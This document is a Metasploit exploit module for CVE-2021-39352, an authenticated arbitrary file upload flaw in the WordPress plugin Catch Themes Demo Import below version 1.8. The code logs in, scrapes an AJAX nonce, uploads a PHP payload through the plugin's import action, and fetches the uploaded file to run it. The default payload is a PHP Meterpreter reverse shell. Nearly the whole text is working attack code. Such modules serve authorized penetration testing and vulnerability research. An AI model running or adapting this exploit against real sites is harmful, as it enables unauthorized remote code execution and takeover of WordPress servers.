Wordpress Plugin Catch Themes Demo Import RCE

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::FileDropper
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HTTP::Wordpress

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Wordpress Plugin Catch Themes Demo Import RCE',
        'Description' => %q{
          The Wordpress Plugin Catch Themes Demo Import versions < 1.8 are vulnerable to authenticated
          arbitrary file uploads via the import functionality found in the
          ~/inc/CatchThemesDemoImport.php file, due to insufficient file type validation.
          Re-exploitation may need a reboot of the server, or to wait an arbitrary timeout.
          During testing this timeout was roughly 5min.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'h00die', # msf module
          'Ron Jost', # edb
          'Thinkland Security Team' # listed on wordfence's site
        ],
        'References' => [
          [ 'EDB', '50580' ],
          [ 'CVE', '2021-39352' ],
          [ 'URL', 'https://plugins.trac.wordpress.org/changeset/2617555/catch-themes-demo-import/trunk/inc/CatchThemesDemoImport.php' ],
          [ 'URL', 'https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39352' ],
          [ 'WPVDB', '781f2ff4-cb94-40d7-96cb-90128daed862' ]
        ],
        'Platform' => ['php'],
        'Privileged' => false,
        'Arch' => ARCH_PHP,
        'Targets' => [
          [ 'Automatic Target', {}]
        ],
        # we leave this out as typically php.ini will bail before 350mb, and payloads are small enough to fit as is.
        # 'Payload'        =>
        # {
        #   # https://plugins.trac.wordpress.org/browser/catch-themes-demo-import/tags/1.6.1/inc/CatchThemesDemoImport.php#L226
        #   'Space' => 367_001_600, # 350mb
        # }
        'DisclosureDate' => '2021-10-21',
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'PAYLOAD' => 'php/meterpreter/reverse_tcp'
        },
        'Notes' => {
          'Stability' => [ CRASH_SAFE ],
          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
          # https://support.shufflehound.com/forums/topic/i-cant-use-the-one-click-demo-installer/#post-31770
          # re-exploitation may need a reboot of the server, or to wait an arbitrary timeout.
          'Reliability' => [ UNRELIABLE_SESSION ]
        }
      )
    )

    register_options [
      OptString.new('USERNAME', [true, 'Username of the account', 'admin']),
      OptString.new('PASSWORD', [true, 'Password of the account', 'admin']),
      OptString.new('TARGETURI', [true, 'The base path of the Wordpress server', '/']),
    ]
  end

  def check
    return CheckCode::Safe('Wordpress not detected.') unless wordpress_and_online?

    checkcode = check_plugin_version_from_readme('catch-themes-demo-import', '1.8')
    if checkcode == CheckCode::Safe
      print_error('catch-themes-demo-import not a vulnerable version')
    end
    checkcode
  end

  def exploit
    cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])

    if cookie.nil?
      vprint_error('Invalid login, check credentials')
      return
    end

    # grab the ajax_nonce
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'wp-admin', 'themes.php'),
      'method' => 'GET',
      'cookie' => cookie,
      'keep_cookies' => 'false', # for some reason wordpress gives back an unauth cookie here, so ignore it.
      'vars_get' => {
        'page' => 'catch-themes-demo-import'
      }
    })
    fail_with(Failure::Unreachable, 'Site not responding') unless res
    fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200
    /"ajax_nonce":"(?<ajax_nonce>[a-z0-9]{10})"/ =~ res.body
    fail_with(Failure::UnexpectedReply, 'Unable to find ajax_nonce on page') unless ajax_nonce
    vprint_status("Ajax Nonce: #{ajax_nonce}")

    random_filename = "#{rand_text_alphanumeric(6..12)}.php"
    vprint_status("Uploading payload filename: #{random_filename}")

    multipart_form = Rex::MIME::Message.new
    multipart_form.add_part('ctdi_import_demo_data', nil, nil, 'form-data; name="action"')
    multipart_form.add_part(ajax_nonce, nil, nil, 'form-data; name="security"')
    multipart_form.add_part('undefined', nil, nil, 'form-data; name="selected"')
    multipart_form.add_part(
      payload.encoded,
      'application/x-php',
      nil,
      "form-data; name=\"content_file\"; filename=\"#{random_filename}\""
    )

    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),
      'method' => 'POST',
      'cookie' => cookie,
      'keep_cookies' => true,
      'ctype' => "multipart/form-data; boundary=#{multipart_form.bound}",
      'data' => multipart_form.to_s
    )
    fail_with(Failure::Unreachable, 'Site not responding') unless res
    fail_with(Failure::UnexpectedReply, 'Plugin not ready to process new payloads. Please retry in a few minutes.') if res.code == 200 && res.body.include?('afterAllImportAJAX')
    fail_with(Failure::UnexpectedReply, 'Failed to upload payload') unless res.code == 500
    # yes, a 500. We uploaded a malformed item, so when it tries to import it, it fails.  This
    # is actually positive as it won't display a malformed item anywhere in the UI.  Simply writes our payload, then exits (non-gracefully)
    #
    # [Fri Dec 24 16:48:00.904980 2021] [php7:error] [pid 440128] [client 192.168.2.199:38107] PHP Fatal error:  Uncaught Error: Class 'XMLReader' not found in /var/www/wordpress/wp-content/plugins/catch-themes-demo-import/vendor/catchthemes/wp-content-importer-v2/src/WXRImporter.php:123
    # Stack trace:
    # #0 /var/www/wordpress/wp-content/plugins/catch-themes-demo-import/vendor/catchthemes/wp-content-importer-v2/src/WXRImporter.php(331): CatchThemes\\WPContentImporter2\\WXRImporter->get_reader()
    # #1 /var/www/wordpress/wp-content/plugins/catch-themes-demo-import/inc/Importer.php(80): CatchThemes\\WPContentImporter2\\WXRImporter->import()
    # #2 /var/www/wordpress/wp-content/plugins/catch-themes-demo-import/inc/Importer.php(137): CTDI\\Importer->import()
    # #3 /var/www/wordpress/wp-content/plugins/catch-themes-demo-import/inc/CatchThemesDemoImport.php(306): CTDI\\Importer->import_content()
    # #4 /var/www/wordpress/wp-includes/class-wp-hook.php(292): CTDI\\CatchThemesDemoImport->import_demo_data_ajax_callback()
    # #5 /var/www/wordpress/wp-includes/class-wp-hook.php(316): WP_Hook->apply_filters()
    # #6 /var/www/wordpress/wp-includes/plugin.php(484): WP_ in /var/www/wordpress/wp-content/plugins/catch-themes-demo-import/vendor/catchthemes/wp-content-importer-v2/src/WXRImporter.php on line 123
    register_file_for_cleanup(random_filename)
    month = Date.today.month.to_s.rjust(2, '0')
    print_status("Triggering payload at wp-content/uploads/#{Date.today.year}/#{month}/#{random_filename}")
    send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'wp-content', 'uploads', Date.today.year, month, random_filename),
      'method' => 'GET',
      'keep_cookies' => true
    )
  end
end